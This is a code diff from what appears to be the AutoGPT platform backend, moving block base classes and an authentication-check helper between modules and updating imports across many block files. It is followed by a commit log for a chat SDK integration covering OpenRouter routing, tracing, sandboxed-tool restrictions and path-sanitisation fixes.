-        self, input_data: BlockSchemaInputType, output: str, **kwargs
-    ) -> Any:
-        async for item in self.run(input_data, **kwargs):
-            name, data = item
-            if name == output:
-                return data
-        raise ValueError(f"{self.name} did not produce any output for {output}")
-
-    def merge_stats(self, stats: "NodeExecutionStats") -> "NodeExecutionStats":
-        self.execution_stats += stats
-        return self.execution_stats
-
-    @property
-    def name(self):
-        return self.__class__.__name__
-
-    def to_dict(self):
-        return {
-            "id": self.id,
-            "name": self.name,
-            "inputSchema": self.input_schema.jsonschema(),
-            "outputSchema": self.output_schema.jsonschema(),
-            "description": self.description,
-            "categories": [category.dict() for category in self.categories],
-            "contributors": [
-                contributor.model_dump() for contributor in self.contributors
-            ],
-            "staticOutput": self.static_output,
-            "uiType": self.block_type.value,
-        }
-
-    def get_info(self) -> BlockInfo:
-        from backend.data.credit import get_block_cost
-
-        return BlockInfo(
-            id=self.id,
-            name=self.name,
-            inputSchema=self.input_schema.jsonschema(),
-            outputSchema=self.output_schema.jsonschema(),
-            costs=get_block_cost(self),
-            description=self.description,
-            categories=[category.dict() for category in self.categories],
-            contributors=[
-                contributor.model_dump() for contributor in self.contributors
-            ],
-            staticOutput=self.static_output,
-            uiType=self.block_type.value,
-        )
-
-    async def execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
-        try:
-            async for output_name, output_data in self._execute(input_data, **kwargs):
-                yield output_name, output_data
-        except Exception as ex:
-            if isinstance(ex, BlockError):
-                raise ex
-            else:
-                raise (
-                    BlockExecutionError
-                    if isinstance(ex, ValueError)
-                    else BlockUnknownError
-                )(
-                    message=str(ex),
-                    block_name=self.name,
-                    block_id=self.id,
-                ) from ex
-
-    async def is_block_exec_need_review(
-        self,
-        input_data: BlockInput,
-        *,
-        user_id: str,
-        node_id: str,
-        node_exec_id: str,
-        graph_exec_id: str,
-        graph_id: str,
-        graph_version: int,
-        execution_context: "ExecutionContext",
-        **kwargs,
-    ) -> tuple[bool, BlockInput]:
-        """
-        Check if this block execution needs human review and handle the review process.
-
-        Returns:
-            Tuple of (should_pause, input_data_to_use)
-            - should_pause: True if execution should be paused for review
-            - input_data_to_use: The input data to use (may be modified by reviewer)
-        """
-        if not (
-            self.is_sensitive_action and execution_context.sensitive_action_safe_mode
-        ):
-            return False, input_data
-
-        from backend.blocks.helpers.review import HITLReviewHelper
-
-        # Handle the review request and get decision
-        decision = await HITLReviewHelper.handle_review_decision(
-            input_data=input_data,
-            user_id=user_id,
-            node_id=node_id,
-            node_exec_id=node_exec_id,
-            graph_exec_id=graph_exec_id,
-            graph_id=graph_id,
-            graph_version=graph_version,
-            block_name=self.name,
-            editable=True,
-        )
-
-        if decision is None:
-            # We're awaiting review - pause execution
-            return True, input_data
-
-        if not decision.should_proceed:
-            # Review was rejected, raise an error to stop execution
-            raise BlockExecutionError(
-                message=f"Block execution rejected by reviewer: {decision.message}",
-                block_name=self.name,
-                block_id=self.id,
-            )
-
-        # Review was approved - use the potentially modified data
-        # ReviewResult.data must be a dict for block inputs
-        reviewed_data = decision.review_result.data
-        if not isinstance(reviewed_data, dict):
-            raise BlockExecutionError(
-                message=f"Review data must be a dict for block input, got {type(reviewed_data).__name__}",
-                block_name=self.name,
-                block_id=self.id,
-            )
-        return False, reviewed_data
-
-    async def _execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
-        # Check for review requirement only if running within a graph execution context
-        # Direct block execution (e.g., from chat) skips the review process
-        has_graph_context = all(
-            key in kwargs
-            for key in (
-                "node_exec_id",
-                "graph_exec_id",
-                "graph_id",
-                "execution_context",
-            )
-        )
-        if has_graph_context:
-            should_pause, input_data = await self.is_block_exec_need_review(
-                input_data, **kwargs
-            )
-            if should_pause:
-                return
-
-        # Validate the input data (original or reviewer-modified) once
-        if error := self.input_schema.validate_data(input_data):
-            raise BlockInputError(
-                message=f"Unable to execute block with invalid input data: {error}",
-                block_name=self.name,
-                block_id=self.id,
-            )
-
-        # Use the validated input data
-        async for output_name, output_data in self.run(
-            self.input_schema(**{k: v for k, v in input_data.items() if v is not None}),
-            **kwargs,
-        ):
-            if output_name == "error":
-                raise BlockExecutionError(
-                    message=output_data, block_name=self.name, block_id=self.id
-                )
-            if self.block_type == BlockType.STANDARD and (
-                error := self.output_schema.validate_field(output_name, output_data)
-            ):
-                raise BlockOutputError(
-                    message=f"Block produced an invalid output data: {error}",
-                    block_name=self.name,
-                    block_id=self.id,
-                )
-            yield output_name, output_data
-
-    def is_triggered_by_event_type(
-        self, trigger_config: dict[str, Any], event_type: str
-    ) -> bool:
-        if not self.webhook_config:
-            raise TypeError("This method can't be used on non-trigger blocks")
-        if not self.webhook_config.event_filter_input:
-            return True
-        event_filter = trigger_config.get(self.webhook_config.event_filter_input)
-        if not event_filter:
-            raise ValueError("Event filter is not configured on trigger")
-        return event_type in [
-            self.webhook_config.event_format.format(event=k)
-            for k in event_filter
-            if event_filter[k] is True
-        ]
-
-
-# Type alias for any block with standard input/output schemas
-AnyBlockSchema: TypeAlias = Block[BlockSchemaInput, BlockSchemaOutput]
--- a/autogpt_platform/backend/backend/blocks/_utils.py
+++ b/autogpt_platform/backend/backend/blocks/_utils.py
@@ -1,122 +0,0 @@
-import logging
-import os
-
-from backend.integrations.providers import ProviderName
-
-from ._base import AnyBlockSchema
-
-logger = logging.getLogger(__name__)
-
-
-def is_block_auth_configured(
-    block_cls: type[AnyBlockSchema],
-) -> bool:
-    """
-    Check if a block has a valid authentication method configured at runtime.
-
-    For example if a block is an OAuth-only block and there env vars are not set,
-    do not show it in the UI.
-
-    """
-    from backend.sdk.registry import AutoRegistry
-
-    # Create an instance to access input_schema
-    try:
-        block = block_cls()
-    except Exception as e:
-        # If we can't create a block instance, assume it's not OAuth-only
-        logger.error(f"Error creating block instance for {block_cls.__name__}: {e}")
-        return True
-    logger.debug(
-        f"Checking if block {block_cls.__name__} has a valid provider configured"
-    )
-
-    # Get all credential inputs from input schema
-    credential_inputs = block.input_schema.get_credentials_fields_info()
-    required_inputs = block.input_schema.get_required_fields()
-    if not credential_inputs:
-        logger.debug(
-            f"Block {block_cls.__name__} has no credential inputs - Treating as valid"
-        )
-        return True
-
-    # Check credential inputs
-    if len(required_inputs.intersection(credential_inputs.keys())) == 0:
-        logger.debug(
-            f"Block {block_cls.__name__} has only optional credential inputs"
-            " - will work without credentials configured"
-        )
-
-    # Check if the credential inputs for this block are correctly configured
-    for field_name, field_info in credential_inputs.items():
-        provider_names = field_info.provider
-        if not provider_names:
-            logger.warning(
-                f"Block {block_cls.__name__} "
-                f"has credential input '{field_name}' with no provider options"
-                " - Disabling"
-            )
-            return False
-
-        # If a field has multiple possible providers, each one needs to be usable to
-        # prevent breaking the UX
-        for _provider_name in provider_names:
-            provider_name = _provider_name.value
-            if provider_name in ProviderName.__members__.values():
-                logger.debug(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"provider '{provider_name}' is part of the legacy provider system"
-                    " - Treating as valid"
-                )
-                break
-
-            provider = AutoRegistry.get_provider(provider_name)
-            if not provider:
-                logger.warning(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"refers to unknown provider '{provider_name}' - Disabling"
-                )
-                return False
-
-            # Check the provider's supported auth types
-            if field_info.supported_types != provider.supported_auth_types:
-                logger.warning(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"has mismatched supported auth types (field <> Provider): "
-                    f"{field_info.supported_types} != {provider.supported_auth_types}"
-                )
-
-            if not (supported_auth_types := provider.supported_auth_types):
-                # No auth methods are been configured for this provider
-                logger.warning(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"provider '{provider_name}' "
-                    "has no authentication methods configured - Disabling"
-                )
-                return False
-
-            # Check if provider supports OAuth
-            if "oauth2" in supported_auth_types:
-                # Check if OAuth environment variables are set
-                if (oauth_config := provider.oauth_config) and bool(
-                    os.getenv(oauth_config.client_id_env_var)
-                    and os.getenv(oauth_config.client_secret_env_var)
-                ):
-                    logger.debug(
-                        f"Block {block_cls.__name__} credential input '{field_name}' "
-                        f"provider '{provider_name}' is configured for OAuth"
-                    )
-                else:
-                    logger.error(
-                        f"Block {block_cls.__name__} credential input '{field_name}' "
-                        f"provider '{provider_name}' "
-                        "is missing OAuth client ID or secret - Disabling"
-                    )
-                    return False
-
-        logger.debug(
-            f"Block {block_cls.__name__} credential input '{field_name}' is valid; "
-            f"supported credential types: {', '.join(field_info.supported_types)}"
-        )
-
-    return True
--- a/autogpt_platform/backend/backend/blocks/agent.py
+++ b/autogpt_platform/backend/backend/blocks/agent.py
@@ -1,7 +1,7 @@
 import logging
-from typing import TYPE_CHECKING, Any, Optional
+from typing import Any, Optional

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockInput,
@@ -9,15 +9,13 @@ from backend.blocks._base import (
    BlockSchema,
    BlockSchemaInput,
    BlockType,
+    get_block,
 )
 from backend.data.execution import ExecutionContext, ExecutionStatus, NodesInputMasks
 from backend.data.model import NodeExecutionStats, SchemaField
 from backend.util.json import validate_with_jsonschema
 from backend.util.retry import func_retry

-if TYPE_CHECKING:
-    from backend.executor.utils import LogMetadata
-
 _logger = logging.getLogger(__name__)


@@ -126,10 +124,9 @@ class AgentExecutorBlock(Block):
        graph_version: int,
        graph_exec_id: str,
        user_id: str,
-        logger: "LogMetadata",
+        logger,
    ) -> BlockOutput:

-        from backend.blocks import get_block
        from backend.data.execution import ExecutionEventType
        from backend.executor import utils as execution_utils

@@ -201,7 +198,7 @@ class AgentExecutorBlock(Block):
        self,
        graph_exec_id: str,
        user_id: str,
-        logger: "LogMetadata",
+        logger,
    ) -> None:
        from backend.executor import utils as execution_utils

--- a/autogpt_platform/backend/backend/blocks/ai_condition.py
+++ b/autogpt_platform/backend/backend/blocks/ai_condition.py
@@ -1,11 +1,5 @@
 from typing import Any

-from backend.blocks._base import (
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.llm import (
    DEFAULT_LLM_MODEL,
    TEST_CREDENTIALS,
@@ -17,6 +11,12 @@ from backend.blocks.llm import (
    LLMResponse,
    llm_call,
 )
+from backend.data.block import (
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import APIKeyCredentials, NodeExecutionStats, SchemaField


--- a/autogpt_platform/backend/backend/blocks/ai_image_customizer.py
+++ b/autogpt_platform/backend/backend/blocks/ai_image_customizer.py
@@ -6,7 +6,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/ai_image_generator_block.py
+++ b/autogpt_platform/backend/backend/blocks/ai_image_generator_block.py
@@ -5,12 +5,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput

-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
+from backend.data.block import Block, BlockCategory, BlockSchemaInput, BlockSchemaOutput
 from backend.data.execution import ExecutionContext
 from backend.data.model import (
    APIKeyCredentials,
--- a/autogpt_platform/backend/backend/blocks/ai_music_generator.py
+++ b/autogpt_platform/backend/backend/blocks/ai_music_generator.py
@@ -6,7 +6,7 @@ from typing import Literal
 from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/ai_shortform_video_block.py
+++ b/autogpt_platform/backend/backend/blocks/ai_shortform_video_block.py
@@ -6,7 +6,7 @@ from typing import Literal

 from pydantic import SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/apollo/organization.py
+++ b/autogpt_platform/backend/backend/blocks/apollo/organization.py
@@ -1,10 +1,3 @@
-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.apollo._api import ApolloClient
 from backend.blocks.apollo._auth import (
    TEST_CREDENTIALS,
@@ -17,6 +10,13 @@ from backend.blocks.apollo.models import (
    PrimaryPhone,
    SearchOrganizationsRequest,
 )
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import CredentialsField, SchemaField


--- a/autogpt_platform/backend/backend/blocks/apollo/people.py
+++ b/autogpt_platform/backend/backend/blocks/apollo/people.py
@@ -1,12 +1,5 @@
 import asyncio

-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.apollo._api import ApolloClient
 from backend.blocks.apollo._auth import (
    TEST_CREDENTIALS,
@@ -21,6 +14,13 @@ from backend.blocks.apollo.models import (
    SearchPeopleRequest,
    SenorityLevels,
 )
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import CredentialsField, SchemaField


--- a/autogpt_platform/backend/backend/blocks/apollo/person.py
+++ b/autogpt_platform/backend/backend/blocks/apollo/person.py
@@ -1,10 +1,3 @@
-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.apollo._api import ApolloClient
 from backend.blocks.apollo._auth import (
    TEST_CREDENTIALS,
@@ -13,6 +6,13 @@ from backend.blocks.apollo._auth import (
    ApolloCredentialsInput,
 )
 from backend.blocks.apollo.models import Contact, EnrichPersonRequest
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import CredentialsField, SchemaField


--- a/autogpt_platform/backend/backend/blocks/ayrshare/_util.py
+++ b/autogpt_platform/backend/backend/blocks/ayrshare/_util.py
@@ -3,7 +3,7 @@ from typing import Optional

 from pydantic import BaseModel, Field

-from backend.blocks._base import BlockSchemaInput
+from backend.data.block import BlockSchemaInput
 from backend.data.model import SchemaField, UserIntegrations
 from backend.integrations.ayrshare import AyrshareClient
 from backend.util.clients import get_database_manager_async_client
--- a/autogpt_platform/backend/backend/blocks/basic.py
+++ b/autogpt_platform/backend/backend/blocks/basic.py
@@ -1,7 +1,7 @@
 import enum
 from typing import Any

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/block.py
+++ b/autogpt_platform/backend/backend/blocks/block.py
@@ -2,7 +2,7 @@ import os
 import re
 from typing import Type

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/branching.py
+++ b/autogpt_platform/backend/backend/blocks/branching.py
@@ -1,7 +1,7 @@
 from enum import Enum
 from typing import Any

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/claude_code.py
+++ b/autogpt_platform/backend/backend/blocks/claude_code.py
@@ -6,7 +6,7 @@ from typing import Literal, Optional
 from e2b import AsyncSandbox as BaseAsyncSandbox
 from pydantic import BaseModel, SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/code_executor.py
+++ b/autogpt_platform/backend/backend/blocks/code_executor.py
@@ -6,7 +6,7 @@ from e2b_code_interpreter import Result as E2BExecutionResult
 from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
 from pydantic import BaseModel, Field, JsonValue, SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/code_extraction_block.py
+++ b/autogpt_platform/backend/backend/blocks/code_extraction_block.py
@@ -1,6 +1,6 @@
 import re

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/codex.py
+++ b/autogpt_platform/backend/backend/blocks/codex.py
@@ -6,7 +6,7 @@ from openai import AsyncOpenAI
 from openai.types.responses import Response as OpenAIResponse
 from pydantic import SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/compass/triggers.py
+++ b/autogpt_platform/backend/backend/blocks/compass/triggers.py
@@ -1,6 +1,6 @@
 from pydantic import BaseModel

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockManualWebhookConfig,
--- a/autogpt_platform/backend/backend/blocks/count_words_and_char_block.py
+++ b/autogpt_platform/backend/backend/blocks/count_words_and_char_block.py
@@ -1,4 +1,4 @@
-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/data_manipulation.py
+++ b/autogpt_platform/backend/backend/blocks/data_manipulation.py
@@ -1,6 +1,6 @@
 from typing import Any, List

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/decoder_block.py
+++ b/autogpt_platform/backend/backend/blocks/decoder_block.py
@@ -1,6 +1,6 @@
 import codecs

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/discord/bot_blocks.py
+++ b/autogpt_platform/backend/backend/blocks/discord/bot_blocks.py
@@ -8,7 +8,7 @@ from typing import Any, Literal, cast
 import discord
 from pydantic import SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/discord/oauth_blocks.py
+++ b/autogpt_platform/backend/backend/blocks/discord/oauth_blocks.py
@@ -2,7 +2,7 @@
 Discord OAuth-based blocks.
 """

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/email_block.py
+++ b/autogpt_platform/backend/backend/blocks/email_block.py
@@ -7,7 +7,7 @@ from typing import Literal

 from pydantic import BaseModel, ConfigDict, SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/encoder_block.py
+++ b/autogpt_platform/backend/backend/blocks/encoder_block.py
@@ -2,7 +2,7 @@

 import codecs

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/enrichlayer/linkedin.py
+++ b/autogpt_platform/backend/backend/blocks/enrichlayer/linkedin.py
@@ -8,7 +8,7 @@ which provides access to LinkedIn profile data and related information.
 import logging
 from typing import Optional

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/fal/ai_video_generator.py
+++ b/autogpt_platform/backend/backend/blocks/fal/ai_video_generator.py
@@ -3,13 +3,6 @@ import logging
 from enum import Enum
 from typing import Any

-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.fal._auth import (
    TEST_CREDENTIALS,
    TEST_CREDENTIALS_INPUT,
@@ -17,6 +10,13 @@ from backend.blocks.fal._auth import (
    FalCredentialsField,
    FalCredentialsInput,
 )
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.execution import ExecutionContext
 from backend.data.model import SchemaField
 from backend.util.file import store_media_file
--- a/autogpt_platform/backend/backend/blocks/flux_kontext.py
+++ b/autogpt_platform/backend/backend/blocks/flux_kontext.py
@@ -5,7 +5,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/checks.py
+++ b/autogpt_platform/backend/backend/blocks/github/checks.py
@@ -3,7 +3,7 @@ from typing import Optional

 from pydantic import BaseModel

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/ci.py
+++ b/autogpt_platform/backend/backend/blocks/github/ci.py
@@ -5,7 +5,7 @@ from typing import Optional

 from typing_extensions import TypedDict

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/issues.py
+++ b/autogpt_platform/backend/backend/blocks/github/issues.py
@@ -3,7 +3,7 @@ from urllib.parse import urlparse

 from typing_extensions import TypedDict

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/pull_requests.py
+++ b/autogpt_platform/backend/backend/blocks/github/pull_requests.py
@@ -2,7 +2,7 @@ import re

 from typing_extensions import TypedDict

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
Show More
Author	SHA1	Message	Date
Zamil Majdy	744fc59c18	fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts with http) and api_key are configured. Otherwise fall back to SDK default credentials so direct Anthropic usage still works.	2026-02-12 13:37:59 +04:00
Zamil Majdy	58847cd242	refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity Also adds gt=0 validation on claude_agent_max_budget_usd per PR review.	2026-02-12 13:36:48 +04:00
Zamil Majdy	d8453bb304	feat(chat/sdk): route SDK through OpenRouter with model config and usage tracking - Add sdk_model and sdk_max_budget_usd config fields for SDK-specific settings - Route SDK CLI API calls through OpenRouter via env vars (ANTHROPIC_BASE_URL, ANTHROPIC_AUTH_TOKEN) for per-call token/cost tracking - Pass model, env, user, and max_budget_usd to ClaudeAgentOptions - Emit StreamUsage from ResultMessage in response adapter - Persist token usage to session.usage in SDK streaming loop - Fix tracing to use configured model instead of hardcoded default - Update Anthropic fallback to use config.api_key/base_url (OpenRouter routing)	2026-02-12 13:12:42 +04:00
Zamil Majdy	d7f7a2747f	fix(backend/chat): Atomic message append to prevent race condition Replace the read-modify-write pattern in stream_chat_post with an atomic append_and_save_message helper that acquires the session lock before re-fetching and appending. This prevents message loss when concurrent requests modify the same session.	2026-02-12 09:10:43 +04:00
Zamil Majdy	68849e197c	format	2026-02-12 08:26:26 +04:00
Zamil Majdy	211478bb29	Revert "style: run ruff format and isort" This reverts commit `40b58807ab`.	2026-02-12 08:25:22 +04:00
Zamil Majdy	0e88dd15b2	feat(chat): add hook-based tracing integration for Claude Agent SDK - Add create_tracing_hooks() for fine-grained tool timing - Add merge_hooks() utility to combine security + tracing hooks - Captures precise pre/post timing for tool executions - Tracks tool failures via PostToolUseFailure hook - Integrates seamlessly with existing security hooks	2026-02-12 03:35:16 +00:00
Zamil Majdy	7f3c227f0a	feat(chat): add modular Langfuse tracing for Claude Agent SDK - Create tracing.py with TracedSession context manager - Automatically trace user messages, SDK messages, and results - Capture tool calls with input/output and timing - Log usage and cost from SDK ResultMessage - No-op when Langfuse not configured (zero overhead) - Clean integration into service.py via context manager	2026-02-12 03:33:37 +00:00
Zamil Majdy	40b58807ab	style: run ruff format and isort	2026-02-12 03:25:19 +00:00
Zamil Majdy	d0e2e6f013	security(service): strengthen path validation for SDK cleanup - Add empty check after session_id sanitization - Add assertion for defense-in-depth - Add explicit '..' traversal check in cleanup - Replace glob with os.listdir to avoid glob injection - Add validation that project_dir stays under ~/.claude/projects - Add warning logs for rejected paths Addresses CodeQL alert about uncontrolled data in path expression	2026-02-12 03:07:08 +00:00
Zamil Majdy	efdc8d73cc	fix(security_hooks): use json.dumps for pattern matching and log warning - Use json.dumps instead of str() for more predictable pattern matching - Log warning when SDK not available and security hooks are disabled Addresses CodeRabbit review feedback	2026-02-12 02:55:04 +00:00
Zamil Majdy	a34810d8a2	revert: remove Bash command extraction from GenericTool Keep it simple - just show 'Bash completed' instead of special handling to extract command names like 'jq completed'	2026-02-12 02:53:37 +00:00
Zamil Majdy	038b7d5841	feat(copilot): show specific command name for Bash tool - Extract command name (jq, grep, etc.) from Bash tool input - Display 'jq completed' instead of 'Bash completed' - Add ripgrep and tree to Dockerfile (match ALLOWED_BASH_COMMANDS)	2026-02-12 02:48:19 +00:00
Zamil Majdy	cac93b0cc9	fix(chat): increase SDK buffer limit and add jq - Add sdk_max_buffer_size config option (default 10MB, was 1MB) - Pass max_buffer_size to ClaudeAgentOptions to prevent crashes on large tool outputs - Install jq in Dockerfile for JSON processing capabilities Fixes AUTOGPT-SERVER-7V2	2026-02-12 02:41:12 +00:00
Zamil Majdy	2025aaf5f2	fix(backend/chat): Preserve full MCP tool output for frontend widgets The SDK CLI truncates large tool results (writing them to disk), which breaks frontend widget rendering (e.g., find_block's block list cards). Stash the full MCP tool output before the SDK sees it, then use the stash in the response adapter so the frontend always receives the complete JSON for proper widget parsing.	2026-02-11 23:13:42 +04:00
Zamil Majdy	ae9bce3bae	feat(backend/chat): Add sandboxed Bash and notify SDK of restrictions - Allow Bash tool with command allowlist (jq, grep, head, tail, etc.) validated via shlex.split for proper quote handling - Add workspace path validation for Bash absolute paths - Add SDK built-in tools (Read/Write/Edit/Glob/Grep/Bash) to allowed_tools - Append Bash restrictions to system prompt (SDK doesn't know our allowlist) - Add default_factory to BlockInfoSummary schema fields - Add 12 Bash sandbox tests covering safe/dangerous commands, substitution, redirection, /dev/ access, path escaping	2026-02-11 22:35:39 +04:00
Zamil Majdy	3107d889fc	feat(frontend/copilot): Add generic tool widget for unrecognized tools SDK built-in tools (Read, Glob, Grep, etc.) have no dedicated frontend widget, so tool calls silently disappeared. Add a GenericTool component that shows a spinning gear + "Running {tool}…" for any tool-* part type that doesn't match a known case.	2026-02-11 22:08:03 +04:00
Zamil Majdy	f174fb6303	fix(backend/chat): Strip MCP prefix from SDK tool names for frontend rendering The Vercel AI SDK frontend renders tool widgets based on tool name (e.g. "tool-find_block", "tool-run_agent"). The SDK sends tool names with the MCP prefix (mcp__copilot__find_block) which didn't match any frontend switch case, causing tool execution to be invisible. Strip the mcp__copilot__ prefix in the response adapter so tool events reach the correct frontend widget handlers.	2026-02-11 22:01:59 +04:00
Zamil Majdy	920a4c5f15	feat(backend/chat): Allow Read/Write/Edit/Glob/Grep in SDK within workspace Move these tools from fully-blocked to workspace-scoped: they are now allowed when the file path stays within the SDK working directory (/tmp/copilot-<session>/) or the tool-results directory (~/.claude/projects/…/tool-results/). This enables the SDK's built-in oversized tool result handling and workspace file operations. - Add _validate_workspace_path() with normpath-based path validation - Pass sdk_cwd from service.py into create_security_hooks() - Add 20 unit tests covering allowed/denied paths, traversal attacks	2026-02-11 20:39:33 +04:00
Zamil Majdy	e95fadbb86	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-11 20:23:56 +04:00
Zamil Majdy	b14b3803ad	feat(backend/chat): Add StreamStartStep/StreamFinishStep to SDK adapter The non-SDK path emits step boundaries (StartStep/FinishStep) around each LLM turn and tool cycle. The SDK adapter was missing these, causing the frontend to lack visual step framing for tool calls. Now the SDK adapter emits: - StreamStartStep after init and before each new LLM turn - StreamFinishStep after tool results and before final finish	2026-02-11 20:18:27 +04:00
Zamil Majdy	82c483d6c8	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-11 07:17:38 +04:00
Zamil Majdy	7cffa1895f	fix(backend/chat): Filter duplicate StreamStart from non-SDK path Routes.py already publishes a StreamStart before calling the service. The SDK path filters the duplicate internally, but the non-SDK path did not, causing two StreamStart events to reach the frontend.	2026-02-11 06:52:47 +04:00
Zamil Majdy	9791bdd724	fix(backend/chat): Use normpath+startswith pattern for CodeQL path sanitization CodeQL doesn't recognize re.sub as a path sanitizer. Switch to the os.path.normpath + startswith prefix check pattern that CodeQL's taint model explicitly recognizes as breaking the taint chain.	2026-02-11 06:45:12 +04:00
Zamil Majdy	750a674c78	fix lock	2026-02-11 06:39:03 +04:00
Zamil Majdy	960c7980a3	fix(backend/chat): Use named helper for session_id sanitization to satisfy CodeQL Replace inline comprehension with _sanitize_session_id() using re.sub so CodeQL recognizes the path-traversal sanitization barrier.	2026-02-11 06:32:16 +04:00
Zamil Majdy	e85d437bb2	fix(backend/chat): Sanitize session_id in SDK cwd path to prevent path traversal	2026-02-11 06:26:48 +04:00
Zamil Majdy	44f9536bd6	fix lock	2026-02-11 06:24:41 +04:00
Zamil Majdy	1c1085a227	Merge remote-tracking branch 'origin/dev' into feat/copitlot-claude-code # Conflicts: # autogpt_platform/backend/backend/api/features/chat/config.py # autogpt_platform/backend/poetry.lock	2026-02-11 05:30:46 +04:00
Zamil Majdy	d7ef70469e	fix(backend/chat): Fix cleanup race condition and move to outer finally - Use session-specific temp dir (/tmp/copilot-{session_id}) as SDK cwd to prevent concurrent sessions from deleting each other's tool-result files during cleanup - Move _cleanup_sdk_tool_results() to outer finally block so it runs even when the outer except Exception fires - Clean up the temp cwd directory after each session - Remove unnecessary inner try/finally nesting	2026-02-11 05:13:02 +04:00
